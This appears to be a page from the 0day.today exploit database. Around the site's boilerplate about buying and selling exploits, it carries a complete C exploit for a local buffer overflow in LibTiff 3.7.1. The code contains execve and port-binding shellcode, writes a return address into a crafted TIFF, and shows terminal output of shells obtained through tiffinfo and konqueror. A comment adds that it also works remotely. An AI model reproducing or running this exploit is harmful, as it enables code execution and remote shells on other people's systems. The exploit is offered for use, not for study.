0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit
=============================================================== LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit =============================================================== /* LibTIFF exploit Tested on LibTIFF 3.7.1 Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat Blog: http://gruba.blogspot.com In other versions and/or Linux distributions you might need to adjust some offsets. gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit cc libtiff_exploit.c -o libtiff_exploit gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff Using RET: 0xbfffffb4 TIFFReadDirectory: Warning, evil.tiff: unknown field with tag 260 (0x104) encountered. evil.tiff: Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed. evil.tiff: Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed. sh-3.00$ gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit /usr/kde/3.3/bin/konqueror evil.tiff Linux Enabled Using RET: 0xbfffffb1 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered. : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed. : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed. sh-3.00$ exit exit Heheh it also works like a remote exploit i would leave that work (easy work) for the "interested" people. */ #include <stdlib.h> #include <string.h> #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define OFFSET 0x3F /* return address offset */ #define SHELL_OFFSET 0x0102 /* shellcode address offset */ #define DISPLAY "DISPLAY=:0.0" /* no comments ... */ #define HOMEDIR "HOME=/tmp/" int main(int argc, char **argv, char **env) { /* Linux shellcode that binds a shell on port 4369 */ char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31" "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52" "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2" "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89" "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0" "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31" "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05" "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f" "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f" "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51" "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; /* (?) lies lies lies lies!*/ #ifdef FREEBSD printf("FreeBSD Enabled\n"); char shellcode[]= "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"; #else printf("Linux Enabled\n"); char shellcode[] = "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c" "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3" "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd" "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\x23"; #endif if(argc < 3) { fprintf(stderr, "Error, arguments are like these\n" "%s <path_to_vuln> <eviltiff.tiff>\n", argv[0]); return -1; } char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL}; /* argv[1] -> executable file that is linked with vuln tiff library */ long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02; int fd = open(argv[2], O_RDWR); if(fd == -1) { perror("open()"); return -1; } if(lseek(fd, OFFSET, SEEK_SET) == -1) { perror("lseek()"); close(fd); return -1; } if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long)) { perror("write()"); close(fd); return -1; } close(fd); fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret); if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1) { perror("execve()"); return -1; } return 0; } # 0day.today [2024-12-24] #